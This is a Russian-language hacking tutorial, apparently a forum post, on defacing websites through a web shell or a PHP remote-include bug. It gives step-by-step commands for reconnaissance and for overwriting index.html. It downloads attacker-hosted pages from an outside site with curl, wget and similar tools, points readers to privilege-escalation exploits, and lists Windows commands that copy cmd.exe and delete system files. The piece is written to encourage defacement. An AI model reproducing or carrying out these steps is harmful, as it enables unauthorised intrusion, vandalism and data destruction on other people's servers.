| Вот решил тоже че-нить написать про дефейс. Ибо недавно сам столкнулся с проблемой ( windows-сервы, но об этом чуть попозже). И так, с чего начать? Допустим,у тебя имеется удаленный веб-шелл ( php-incude, cgi,php-system; cgi-open, нужное подчеркнуть) Короче, главное чтоб был какой-нибудь доступ к серву и его каталогам. 1. *nix Итак, давай разберемся с никсовыми тачками. Тут мне показалось все довольно просто, думаю что и ты без труда все поймешь. Допустим некоторый сайт, где ты имеешь веб-шелл через пхп-инклуд ошибку. Назовем его http://localhost/index.php?open=http://for...packer.php?cmd= (где http://forattack.narod.ru/packer.php - путь к твоему сайту с залитым скриптом, подробнее можно почитать тут). Для начала собирем некоторую инфу о сервере и о расположении корневого каталога с html. Для этого придаем cmd значения uname -a; pwd; whoami; id; ps -aux. Для тех, кто не знает значения никсовых комманд - читать врезку. ============================================== uname -a - выдает название ОСи серва, с установленными на нее сервисами (версия php и т.д). Очень пригодится потом: если права будут nobody и без прав записи - можно будет поискать сплоит на сайтах типа секьюритилаб.ру, которые повысят твои права. pwd - с помощью этой команды, можно узнать расположение корневого каталога с html, жизненно необходимо. whoami - узнаем свою учетную запись. А вдруг мы root? id - смотрим свои права. ps -aux - показывает список процессов системы. Можно косвенно проверить есть ли администратор в системе which - поиск по серву ( например which curl; which perl) echo > имя_файла - запись, с перенаправлением в файл ( например echo qwerty > index.html) cp имя_файла имя_файла1 - копирование rm имя_файла - удаление ls -la имя_каталога - отображает нужный каталог cat имя_файла - открывает для чтения файл cd - выбираем папку для последующего использования ============================================== Итак, вся необходимая инфа собрана. Лезем в корневой каталог. Допустим pwd тебе выдало нечто вроде home/www/public_html/cgi-din/fuck.cgi - здесь корень будет home/www/public_html. Сразу смотрим права на запись в эту папку (юзай статью из нашей рассылки, мы об этом уже писали). Делается это командой ls -la home/www/public_html. Допустим тебе повезло и есть право на запись в корневой каталог (благо, что таких сайтов 80%, это по личному опыту ) Дальше собственно все дело в шляпе. Можно не гемороиться и самоутвердитmся всего лишь одной командой echo 0wn3d by v4$jA > home/www/public_html/index.html. Ну а если захочтеся погемороится, подключив свою собстеввную страничку, картинку или даже аплет - читаем далее. Чтобы закачать на серв свои файлы - придется прибегнуть к помощи спец. утилит-качалок, установленных на серве. Благо их может быть всего 6 : curl, fetch, links, lynx, get, wget. Поиск утилит осуществляется с помошбю команды which ( например which curl). Для тех, кто не знает синтаксиса утилит - читаем следующую врезку ============================================== curl --output home/www/public_html/index1.html http://forattack.narod.ru/index.html fetch -o home/www/public_html/index1.html http://forattack.narod.ru/index.html links -source "http://forattack.narod.ru/index1.html" > home/www/public_html/index.html lynx аналогично links get http://forattack.narod.ru/index1.html > home/www/public_html/index.html wget -o home/www/public_html/index1.html http://forattack.narod.ru/index.html ============================================== Например установленна утилита curl - тогда набираем в строке: cd home/www/public_html/; curl ---output home/www/public_html/index1.html http://forattack.narod.ru/index.html; ls -la Итак, ты последовательно выкачиваешь все необходимые файлы. Дальше делаем резервную копию исходного index.html командой cp index.html index.backup.html ( закон доброго скрипткидиса ) И заменяем index.html на свой index1.html. Все, дефейснуто . 2. win Итак, не дай Бог, тебе попался вынь-серв. С ним, имхо , все будет потруднее. Особо распинаться я не буду, ибо сам все толком не понимаю. После часа юзания я.ру - ничего путного не нашел. Но общий смысл все тот же, разве что вместо *nix-команд используются вынь-команды. "Незнающие" читают врезку ============================================== dir c:\ показывает содержание диска c:\ cp c:\winnt\system32\cmd.exe c:\nteam.exe копирует файл cmd.exe в файл c:\nteam.exe echo hacked > "index.html" записывает hacked index.html rm c:\autoexec.bat удаляет файл autoexec.bat del c:\autoexec.bat удаляет файл autoexec.bat rmdir c:\popa удаляет папку popa netstat выводит список подключений к системе ============================================== Короче, таким способом выкачиваем все файлы и заменяем на свои. Не знаю почему, но с win-cервами я гемороился больше. Наверно доков по дефейсу страниц nix-систем просто поболе На этом можно закончить. Удачных дефейсов
|